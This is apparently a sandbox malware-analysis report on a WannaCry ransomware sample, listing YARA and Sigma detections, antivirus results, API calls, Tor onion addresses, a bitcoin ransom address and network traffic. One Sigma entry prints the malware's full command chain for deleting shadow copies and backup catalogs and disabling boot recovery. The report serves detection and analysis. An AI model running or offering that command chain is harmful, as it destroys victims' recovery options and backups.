33.0.@WanaDecryptor@.exe.400000.0.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
33.0.@WanaDecryptor@.exe.400000.0.unpack	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x133e6:$main_6: FF 74 24 10 FF 74 24 10 FF 74 24 10 FF 74 24 10 E8 43 00 00 00 C2 0x1caa:$set_reg_key_6: 68 C8 FD 41 00 F3 AB 66 AB AA 8D 44 24 1C C7 44 24 14 00 00 00 00 50 FF 15 54 55 41 00 8B 2D E8 50 41 00 8B 1D 0C 50 41 00 83 C4 08 33 FF 89 7C 24 14 85 FF 75 11 8D 4C 24 10 8D 54 24 18 51 52 ... 0x13102:$entrypoint_all: 55 8B EC 6A FF 68 A8 BA 41 00 68 50 30 41 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 24 55 41 00 59 83 0D 98 22 42 00 FF 83 0D 9C 22 42 ...
30.0.@WanaDecryptor@.exe.400000.0.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
30.0.@WanaDecryptor@.exe.400000.0.unpack	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x133e6:$main_6: FF 74 24 10 FF 74 24 10 FF 74 24 10 FF 74 24 10 E8 43 00 00 00 C2 0x1caa:$set_reg_key_6: 68 C8 FD 41 00 F3 AB 66 AB AA 8D 44 24 1C C7 44 24 14 00 00 00 00 50 FF 15 54 55 41 00 8B 2D E8 50 41 00 8B 1D 0C 50 41 00 83 C4 08 33 FF 89 7C 24 14 85 FF 75 11 8D 4C 24 10 8D 54 24 18 51 52 ... 0x13102:$entrypoint_all: 55 8B EC 6A FF 68 A8 BA 41 00 68 50 30 41 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 24 55 41 00 59 83 0D 98 22 42 00 FF 83 0D 9C 22 42 ...
47.2.@WanaDecryptor@.exe.400000.0.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
47.2.@WanaDecryptor@.exe.400000.0.unpack	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x133e6:$main_6: FF 74 24 10 FF 74 24 10 FF 74 24 10 FF 74 24 10 E8 43 00 00 00 C2 0x1caa:$set_reg_key_6: 68 C8 FD 41 00 F3 AB 66 AB AA 8D 44 24 1C C7 44 24 14 00 00 00 00 50 FF 15 54 55 41 00 8B 2D E8 50 41 00 8B 1D 0C 50 41 00 83 C4 08 33 FF 89 7C 24 14 85 FF 75 11 8D 4C 24 10 8D 54 24 18 51 52 ... 0x13102:$entrypoint_all: 55 8B EC 6A FF 68 A8 BA 41 00 68 50 30 41 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 24 55 41 00 59 83 0D 98 22 42 00 FF 83 0D 9C 22 42 ...
27.2.@WanaDecryptor@.exe.400000.0.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
27.2.@WanaDecryptor@.exe.400000.0.unpack	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x133e6:$main_6: FF 74 24 10 FF 74 24 10 FF 74 24 10 FF 74 24 10 E8 43 00 00 00 C2 0x1caa:$set_reg_key_6: 68 C8 FD 41 00 F3 AB 66 AB AA 8D 44 24 1C C7 44 24 14 00 00 00 00 50 FF 15 54 55 41 00 8B 2D E8 50 41 00 8B 1D 0C 50 41 00 83 C4 08 33 FF 89 7C 24 14 85 FF 75 11 8D 4C 24 10 8D 54 24 18 51 52 ... 0x13102:$entrypoint_all: 55 8B EC 6A FF 68 A8 BA 41 00 68 50 30 41 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 24 55 41 00 59 83 0D 98 22 42 00 FF 83 0D 9C 22 42 ...
27.0.@WanaDecryptor@.exe.400000.0.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
27.0.@WanaDecryptor@.exe.400000.0.unpack	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x133e6:$main_6: FF 74 24 10 FF 74 24 10 FF 74 24 10 FF 74 24 10 E8 43 00 00 00 C2 0x1caa:$set_reg_key_6: 68 C8 FD 41 00 F3 AB 66 AB AA 8D 44 24 1C C7 44 24 14 00 00 00 00 50 FF 15 54 55 41 00 8B 2D E8 50 41 00 8B 1D 0C 50 41 00 83 C4 08 33 FF 89 7C 24 14 85 FF 75 11 8D 4C 24 10 8D 54 24 18 51 52 ... 0x13102:$entrypoint_all: 55 8B EC 6A FF 68 A8 BA 41 00 68 50 30 41 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 24 55 41 00 59 83 0D 98 22 42 00 FF 83 0D 9C 22 42 ...
30.2.@WanaDecryptor@.exe.400000.0.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
30.2.@WanaDecryptor@.exe.400000.0.unpack	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x133e6:$main_6: FF 74 24 10 FF 74 24 10 FF 74 24 10 FF 74 24 10 E8 43 00 00 00 C2 0x1caa:$set_reg_key_6: 68 C8 FD 41 00 F3 AB 66 AB AA 8D 44 24 1C C7 44 24 14 00 00 00 00 50 FF 15 54 55 41 00 8B 2D E8 50 41 00 8B 1D 0C 50 41 00 83 C4 08 33 FF 89 7C 24 14 85 FF 75 11 8D 4C 24 10 8D 54 24 18 51 52 ... 0x13102:$entrypoint_all: 55 8B EC 6A FF 68 A8 BA 41 00 68 50 30 41 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 24 55 41 00 59 83 0D 98 22 42 00 FF 83 0D 9C 22 42 ...
0.0.Wannacry.exe.400000.0.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
0.0.Wannacry.exe.400000.0.unpack	Win32_Ransomware_WannaCry	unknown	ReversingLabs	0x2016:$main_2: 68 08 02 00 00 33 DB 50 53 FF 15 8C 80 40 00 68 AC F8 40 00 E8 F6 F1 FF FF 59 FF 15 6C 81 40 00 83 38 02 75 53 68 38 F5 40 00 FF 15 68 81 40 00 8B 00 FF 70 04 E8 F0 56 00 00 59 85 C0 59 75 38 ... 0x77ba:$entrypoint_all: 55 8B EC 6A FF 68 88 D4 40 00 68 F4 76 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 68 53 56 57 89 65 E8 33 DB 89 5D FC 6A 02 FF 15 C4 81 40 00 59 83 0D 4C F9 40 00 FF 83 0D 50 F9 40 ...
0.0.Wannacry.exe.400000.0.unpack	wanna_cry_ransomware_generic	detects wannacry ransomware on disk and in virtual page	us-cert code analysis team	0xf4d8:$s11: 74 61 73 6B 73 63 68 65 2E 65 78 65 00 00 00 00 54 61 73 6B 53 74 61 72 74 00 00 00 74 2E 77 6E 72 79 00 00 69 63 61 63 0xf500:$s12: 6C 73 20 2E 20 2F 67 72 61 6E 74 20 45 76 65 72 79 6F 6E 65 3A 46 20 2F 54 20 2F 43 20 2F 51 00 61 74 74 72 69 62 20 2B 68
0.0.Wannacry.exe.400000.0.unpack	WannaCry_Ransomware	Detects WannaCry Ransomware	Florian Roth (with the help of binar.ly)	0xf4fc:$x1: icacls . /grant Everyone:F /T /C /Q 0x342d41:$x2: taskdl.exe 0x35962d:$x2: taskdl.exe 0xf4d8:$x3: tasksche.exe 0xf4b4:$x4: Global\MsWinZonesCacheCounterMutexA 0xf52c:$x5: WNcry@2ol7 0xf4fc:$x9: icacls . /grant Everyone:F /T /C /Q 0x359d91:$s2: Windows 10 --> 0xf42c:$s3: cmd.exe /c "%s" 0x41980:$s4: msg/m_portuguese.wnry 0x3591ff:$s4: msg/m_portuguese.wnry 0x2a02:$op4: 09 FF 76 30 50 FF 56 2C 59 59 47 3B 7E 0C 7C 0x26dc:$op5: C1 EA 1D C1 EE 1E 83 E2 01 83 E6 01 8D 14 56 0x22c8:$op6: 8D 48 FF F7 D1 8D 44 10 FF 23 F1 23 C1
Click to see the 15 entries

Sigma Signatures

Operating System Destruction

Sigma detected: Delete shadow copy via WMIC

Source: Process started

Author: Joe Security: Data: Command: cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet, CommandLine: cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: @WanaDecryptor@.exe vs, ParentImage: C:\Users\user\Desktop\@WanaDecryptor@.exe, ParentProcessId: 8904, ParentProcessName: @WanaDecryptor@.exe, ProcessCommandLine: cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet, ProcessId: 9004, ProcessName: cmd.exe

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for dropped file

Source: C:\@WanaDecryptor@.exe	Avira: detection malicious, Label: LNK/Runner.VPDJ
Source: C:\@WanaDecryptor@.exe	Avira: detection malicious, Label: LNK/Runner.VPDJ
Source: C:\@WanaDecryptor@.exe	Avira: detection malicious, Label: LNK/Runner.VPDJ
Source: C:\@WanaDecryptor@.exe	Avira: detection malicious, Label: LNK/Runner.VPDJ
Source: C:\@WanaDecryptor@.exe	Avira: detection malicious, Label: LNK/Runner.VPDJ
Source: C:\@WanaDecryptor@.exe	Avira: detection malicious, Label: LNK/Runner.VPDJ
Source: C:\@WanaDecryptor@.exe	Avira: detection malicious, Label: LNK/Runner.VPDJ
Source: C:\@WanaDecryptor@.exe	Avira: detection malicious, Label: LNK/Runner.VPDJ
Source: C:\@WanaDecryptor@.exe	Avira: detection malicious, Label: TR/FileCoder.724645
Source: C:\@WanaDecryptor@.exe	Avira: detection malicious, Label: LNK/Runner.VPDJ
Source: C:\@WanaDecryptor@.exe	Avira: detection malicious, Label: LNK/Runner.VPDJ
Source: C:\@WanaDecryptor@.exe	Avira: detection malicious, Label: TR/FileCoder.724645
Source: C:\@WanaDecryptor@.exe	Avira: detection malicious, Label: LNK/Runner.VPDJ

Multi AV Scanner detection for submitted file

Source: Wannacry.exe	ReversingLabs: Detection: 92%
Source: Wannacry.exe	Virustotal: Detection: 94%			Perma Link

Antivirus / Scanner detection for submitted sample

Source: Wannacry.exe

Avira: detected

Multi AV Scanner detection for dropped file

Source: C:\@WanaDecryptor@.exe	ReversingLabs: Detection: 96%
Source: C:\Users\user\AppData\Local\@WanaDecryptor@.exe	ReversingLabs: Detection: 96%
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	ReversingLabs: Detection: 96%
Source: C:\Users\user\Desktop\taskdl.exe	ReversingLabs: Detection: 89%
Source: C:\Users\user\Desktop\taskse.exe	ReversingLabs: Detection: 89%
Source: C:\Users\user\Desktop\u.wnry	ReversingLabs: Detection: 96%
Source: C:\Users\user\Documents\@WanaDecryptor@.exe	ReversingLabs: Detection: 96%
Source: C:\Users\user\Downloads\@WanaDecryptor@.exe	ReversingLabs: Detection: 96%
Source: C:\Users\Default\Desktop\@WanaDecryptor@.exe	ReversingLabs: Detection: 96%
Source: C:\Users\Public\Desktop\@WanaDecryptor@.exe	ReversingLabs: Detection: 96%
Source: C:\found.001\@WanaDecryptor@.exe	ReversingLabs: Detection: 96%

Machine Learning detection for sample

Source: Wannacry.exe

Joe Sandbox ML: detected

Machine Learning detection for dropped file

Source: C:\@WanaDecryptor@.exe	Joe Sandbox ML: detected
Source: C:\@WanaDecryptor@.exe	Joe Sandbox ML: detected

Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 27_2_004049B0 CreateFileA,GetFileSize,GlobalAlloc,ReadFile,CryptImportKey,_local_unwind2,_local_unwind2,	27_2_004049B0
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 27_2_00404AF0 EnterCriticalSection,CryptDecrypt,LeaveCriticalSection,LeaveCriticalSection,	27_2_00404AF0
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 27_2_00404B70 CryptAcquireContextA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CryptAcquireContextA,CryptImportKey,CryptDestroyKey,CryptEncrypt,CryptDecrypt,	27_2_00404B70
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 27_2_004046F0 CryptImportKey,	27_2_004046F0
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 27_2_004046B0 CryptAcquireContextA,	27_2_004046B0
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 27_2_00404770 CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,	27_2_00404770
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 27_2_004047C0 CryptEncrypt,_local_unwind2,CryptDecrypt,strncmp,_local_unwind2,	27_2_004047C0
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 30_2_004049B0 CreateFileA,GetFileSize,GlobalAlloc,ReadFile,CryptImportKey,_local_unwind2,_local_unwind2,	30_2_004049B0
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 30_2_00404AF0 EnterCriticalSection,CryptDecrypt,LeaveCriticalSection,LeaveCriticalSection,	30_2_00404AF0
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 30_2_00404B70 CryptAcquireContextA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CryptAcquireContextA,CryptImportKey,CryptDestroyKey,CryptEncrypt,CryptDecrypt,	30_2_00404B70
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 30_2_004046F0 CryptImportKey,	30_2_004046F0
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 30_2_004046B0 CryptAcquireContextA,	30_2_004046B0
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 30_2_00404770 CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,	30_2_00404770
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 30_2_004047C0 CryptEncrypt,_local_unwind2,CryptDecrypt,strncmp,_local_unwind2,	30_2_004047C0
Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe	Code function: 31_2_00F0C797 abort,CryptAcquireContextA,CryptGenRandom,__stack_chk_fail,	31_2_00F0C797
Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe	Code function: 31_2_00F05EA1 ERR_load_crypto_strings,OPENSSL_add_all_algorithms_noconf,SSLeay,SSLeay_version,strcmp,__stack_chk_fail,	31_2_00F05EA1
Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe	Code function: 31_2_00F08475 abort,abort,abort,abort,abort,RSA_private_encrypt,__stack_chk_fail,	31_2_00F08475
Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe	Code function: 31_2_00F0E737 i2d_X509,free,X509_free,memcpy,CRYPTO_free,X509_get_pubkey,EVP_PKEY_get1_RSA,EVP_PKEY_free,__stack_chk_fail,	31_2_00F0E737
Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe	Code function: 31_2_00F08EFB i2d_RSAPublicKey,CRYPTO_free,memcpy,CRYPTO_free,__stack_chk_fail,	31_2_00F08EFB
Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe	Code function: 31_2_00F09070 i2d_RSAPublicKey,CRYPTO_free,CRYPTO_free,__stack_chk_fail,	31_2_00F09070
Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe	Code function: 31_2_00F09110 i2d_RSAPublicKey,CRYPTO_free,CRYPTO_free,__stack_chk_fail,	31_2_00F09110

Source: Wannacry.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 86.59.21.38:443 -> 192.168.11.20:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 131.188.40.189:443 -> 192.168.11.20:49740 version: TLS 1.2

Source:	Binary string: tC:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Office\OTele\excel.exe.db_prod.pdbllRegexta\Applicao=,i source: Wannacry.exe, 00000000.00000003.1997759022.0000000003C33000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: aC:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Explorer\iconcache_256.dbs\ntkrnlmp.pdbwekyb3d8bbwewe source: Wannacry.exe, 00000000.00000003.1997759022.0000000003C33000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\Wannacry.exe	File opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\ARM\~SD720A.tmp	Jump to behavior
Source: C:\Users\user\Desktop\Wannacry.exe	File opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\~SD7208.tmp	Jump to behavior
Source: C:\Users\user\Desktop\Wannacry.exe	File opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\~SD7209.tmp	Jump to behavior
Source: C:\Users\user\Desktop\Wannacry.exe	File opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\~SD720C.tmp	Jump to behavior
Source: C:\Users\user\Desktop\Wannacry.exe	File opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\~SD720D.tmp	Jump to behavior
Source: C:\Users\user\Desktop\Wannacry.exe	File opened: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Temp\~SD720B.tmp	Jump to behavior

Source: C:\Users\user\Desktop\taskdl.exe	Code function: 6_2_00401080 GetDriveTypeW,Sleep,swprintf,swprintf,FindFirstFileW,swprintf,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z,?_Eos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXI@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,FindNextFileW,FindClose,DeleteFileW,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,DeleteFileW,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,	6_2_00401080
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 27_2_004080C0 __p___argv,FindFirstFileA,fopen,fread,sscanf,fopen,fread,fclose,FindNextFileA,FindClose,sprintf,#537,#537,	27_2_004080C0
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 27_2_00403CB0 FindFirstFileA,SendMessageA,SendMessageA,sscanf,fopen,fread,sprintf,SendMessageA,#823,SendMessageA,fclose,FindNextFileA,FindClose,	27_2_00403CB0
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 27_2_004026B0 swprintf,FindFirstFileW,#825,#825,wcscmp,wcslen,wcscmp,wcscmp,swprintf,GetFileAttributesW,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z,wcscmp,wcscmp,wcscmp,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,FindNextFileW,FindClose,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,swprintf,swprintf,DeleteFileW,swprintf,DeleteFileW,#825,#825,	27_2_004026B0
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 30_2_004080C0 __p___argv,FindFirstFileA,fopen,fread,sscanf,fopen,fread,fclose,FindNextFileA,FindClose,sprintf,#537,#537,	30_2_004080C0
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 30_2_00403CB0 FindFirstFileA,SendMessageA,SendMessageA,sscanf,fopen,fread,sprintf,SendMessageA,#823,SendMessageA,fclose,FindNextFileA,FindClose,	30_2_00403CB0
Source: C:\Users\user\Desktop\@WanaDecryptor@.exe	Code function: 30_2_004026B0 swprintf,FindFirstFileW,#825,#825,wcscmp,wcslen,wcscmp,wcscmp,swprintf,GetFileAttributesW,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z,wcscmp,wcscmp,wcscmp,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,FindNextFileW,FindClose,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,swprintf,swprintf,DeleteFileW,swprintf,DeleteFileW,#825,#825,	30_2_004026B0
Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe	Code function: 31_2_00EF843C FindFirstFileA,free,strcmp,strcmp,FindNextFileA,GetLastError,free,FindClose,free,__stack_chk_fail,	31_2_00EF843C

Networking

Installs TOR (Internet Anonymizer)

Source: C:\Users\user\Desktop\@WanaDecryptor@.exe

File created: C:\Users\user\Desktop\TaskData\Tor\tor.exe

Jump to behavior

Found Tor onion address

Source: @WanaDecryptor@.exe, 0000001B.00000002.5853881951.0000000000198000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: C12t9YDPgwueZ9NyMgw519p7AA8isjr6SMwgx7ekbenv2riucmf.onion;57g7spgrzlojinas.onion;xxlvbrloxvriy2c5.onion;76jdd2ir2embyv47.onion;cwwnhwhlz52maqm7.onion;https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip$
Source: @WanaDecryptor@.exe, 0000001E.00000002.2121797848.0000000000C00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C12t9YDPgwueZ9NyMgw519p7AA8isjr6SMwgx7ekbenv2riucmf.onion;57g7spgrzlojinas.onion;xxlvbrloxvriy2c5.onion;76jdd2ir2embyv47.onion;cwwnhwhlz52maqm7.onion;https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip
Source: @WanaDecryptor@.exe, 0000001E.00000002.2120270411.000000000019B000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: C12t9YDPgwueZ9NyMgw519p7AA8isjr6SMwgx7ekbenv2riucmf.onion;57g7spgrzlojinas.onion;xxlvbrloxvriy2c5.onion;76jdd2ir2embyv47.onion;cwwnhwhlz52maqm7.onion;https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip$
Source: @WanaDecryptor@.exe, 00000021.00000002.5853775977.000000000019A000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: C12t9YDPgwueZ9NyMgw519p7AA8isjr6SMwgx7ekbenv2riucmf.onion;57g7spgrzlojinas.onion;xxlvbrloxvriy2c5.onion;76jdd2ir2embyv47.onion;cwwnhwhlz52maqm7.onion;https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip

Source: global traffic	TCP traffic: 192.168.11.20:49724 -> 146.185.177.103:9030
Source: global traffic	TCP traffic: 192.168.11.20:49733 -> 212.47.237.95:9001
Source: global traffic	TCP traffic: 192.168.11.20:49737 -> 51.254.246.203:9001

Source: taskhsvc.exe, 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmp, taskhsvc.exe.27.dr	String found in binary or memory: http://freehaven.net/anonbib/#hs-attack06
Source: @WanaDecryptor@.exe, @WanaDecryptor@.exe, 0000001E.00000000.2017719338.000000000041F000.00000008.00000001.01000000.00000008.sdmp, @WanaDecryptor@.exe, 0000001E.00000002.2120705123.0000000000421000.00000004.00000001.01000000.00000008.sdmp, @WanaDecryptor@.exe, 00000021.00000002.5854829529.0000000000421000.00000004.00000001.01000000.00000008.sdmp, @WanaDecryptor@.exe, 00000021.00000000.2040530880.000000000041F000.00000008.00000001.01000000.00000008.sdmp, @WanaDecryptor@.exe, 0000002F.00000002.2348372222.0000000000421000.00000004.00000001.01000000.00000008.sdmp, @WanaDecryptor@.exe, 0000002F.00000000.2346390626.000000000041F000.00000008.00000001.01000000.00000008.sdmp, @WanaDecryptor@.exe0.0.dr	String found in binary or memory: http://www.btcfrog.com/qr/bitcoinPNG.php?address=%s
Source: Wannacry.exe, 00000000.00000003.848497025.00000000007CA000.00000004.00000020.00020000.00000000.sdmp, Wannacry.exe, 00000000.00000003.2011922304.0000000000802000.00000004.00000020.00020000.00000000.sdmp, Wannacry.exe, 00000000.00000003.1362189646.00000000007F7000.00000004.00000020.00020000.00000000.sdmp, Wannacry.exe, 00000000.00000003.2010730954.0000000000801000.00000004.00000020.00020000.00000000.sdmp, @WanaDecryptor@.exe, 0000001B.00000000.2015355782.000000000041F000.00000008.00000001.01000000.00000008.sdmp, @WanaDecryptor@.exe, 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmp, @WanaDecryptor@.exe, 0000001E.00000000.2017719338.000000000041F000.00000008.00000001.01000000.00000008.sdmp, @WanaDecryptor@.exe, 0000001E.00000002.2120705123.0000000000421000.00000004.00000001.01000000.00000008.sdmp, @WanaDecryptor@.exe, 00000021.00000002.5854829529.0000000000421000.00000004.00000001.01000000.00000008.sdmp, @WanaDecryptor@.exe, 00000021.00000000.2040530880.000000000041F000.00000008.00000001.01000000.00000008.sdmp, @WanaDecryptor@.exe, 0000002F.00000002.2348372222.0000000000421000.00000004.00000001.01000000.00000008.sdmp, @WanaDecryptor@.exe, 0000002F.00000000.2346390626.000000000041F000.00000008.00000001.01000000.00000008.sdmp, @WanaDecryptor@.exe0.0.dr	String found in binary or memory: http://www.btcfrog.com/qr/bitcoinPNG.php?address=%smailto:%shttps://www.google.com/search?q=how
Source: @WanaDecryptor@.exe, 00000021.00000002.5857492036.0000000000B60000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.btcfrog.com/qr/bitcoinPNG.php?address=12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw
Source: taskhsvc.exe, 0000001F.00000002.5869999732.000000006D03C000.00000008.00000001.01000000.0000000F.sdmp, taskhsvc.exe, 0000001F.00000002.5875196213.000000006D25A000.00000008.00000001.01000000.00000010.sdmp	String found in binary or memory: http://www.openssl.org/V
Source: taskhsvc.exe, 0000001F.00000002.5874181370.000000006D1DD000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: http://www.openssl.org/support/faq.html
Source: taskhsvc.exe, 0000001F.00000002.5874181370.000000006D1DD000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: http://www.openssl.org/support/faq.htmlRAND
